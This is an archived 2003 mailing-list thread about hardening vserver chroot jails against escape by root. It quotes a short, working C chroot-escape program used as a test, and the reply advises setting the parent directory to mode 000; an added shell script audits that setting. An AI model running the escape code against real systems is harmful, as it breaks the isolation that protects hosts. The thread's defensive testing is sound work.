From: John P. Eisenmenger (jpe_at_eisenmenger.org)
Date: Tue 04 Mar 2003 - 16:17:51 GMT
Do you have the parent directory of the vserver root set with mode 000?
For example:
root_at_john jpe # ls -ld /vservers /vservers/gentoo /vservers/x
d--------- 5 root root 4096 Feb 24 15:45 /vservers
drwxr-xr-x 17 root root 4096 Feb 12 10:35 /vservers/gentoo
drwxr-xr-x 16 root root 4096 Feb 12 15:42 /vservers/x
Supposedly setting the permissions of the parent directory to 000 blocks
this method of escape. In fact I believe the vserver command will
complain loudly if this is not the case.
-John
On Tue, 4 Mar 2003, Mihai RUSU wrote:
> Hi
>
> I am trying to secure a chroot environment for vserver. Problem is that
> standard chroot can be escaped very easily with a small program (if the user
> has uid 0 access, if he can do chroot()).
>
> Here is the program I use to test chroot() protection:
>
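> #include <stdio.h>
> #include <fcntl.h>
> #include <unistd.h>     /* chroot, fchdir, chdir */
> #include <sys/stat.h>   /* mkdir */
>
> int main()
> {
>     int fd;
>
>     mkdir("bla", 0755);
>     fd = open(".", O_RDONLY);   /* keep a handle on the current directory */
>     chroot("bla");
>     fchdir(fd);
>     chdir("../../../../../../../../../..");
>     mkdir("escaped", 0755);     /* marker directory the test looks for */
>     return 0;
> }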
>
> Doing standard chroot in a chroot environment then running this little prog
> creates an "escaped" directory in the real root of the system :(
>
> Problem is that I tried capchroot --nochroot and it does the same. Also I
> have tried chcontext --secure. I was looking for help from reducecap but
> it seems it doesn't remove the capability:
>
> # reducecap --secure --SYS_CHROOT /bin/bash
> Executing
> # reducecap --show
> ...
> CAP_SYS_CHROOT X X
>
> How can I make sure nobody (not even uid 0) from a vserver can escape its
> chroot jail?
>
> Thanks
>
> ----------------------------
> Mihai RUSU
>
> Disclaimer: Any views or opinions presented within this e-mail are solely
> those of the author and do not necessarily represent those of any company,
> unless otherwise specifically stated.
>
-- John P. Eisenmenger jpe_at_eisenmenger.org
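
The check described in the reply above (parent directory of each vserver root at mode 000), written as an audit script. This is an added example, not part of the original thread or the vserver tools; the function names are hypothetical and GNU stat is assumed.

```shell
#!/bin/sh
# Added example (not from the thread or the vserver tools): audit that the
# parent directory of each vserver root has mode 000, as in the ls -ld output.
# Assumes GNU coreutils stat; function names are hypothetical.

# check_barrier ROOT
# Returns 0 if ROOT's parent has no permission bits set, 1 if it has any,
# 2 if the parent cannot be assessed (missing, not a directory, or a symlink).
check_barrier() {
    parent=$(dirname -- "$1")
    if [ -L "$parent" ] || [ ! -d "$parent" ]; then
        echo "UNKNOWN $1: $parent is not a plain directory"
        return 2
    fi
    mode=$(stat -c '%a' -- "$parent") || return 2
    if [ "$mode" = "0" ]; then
        echo "OK      $1: $parent is mode 000"
        return 0
    fi
    echo "OPEN    $1: $parent is mode $mode, expected 000"
    return 1
}

# audit_vservers ROOT...
# Checks every root given and returns non-zero if any parent is not mode 000.
audit_vservers() {
    failed=0
    for root in "$@"; do
        check_barrier "$root" || failed=1
    done
    return "$failed"
}

# Usage: audit_vservers /vservers/gentoo /vservers/x
```

Only the path's immediate parent is examined, and a symlinked parent is reported as UNKNOWN rather than followed.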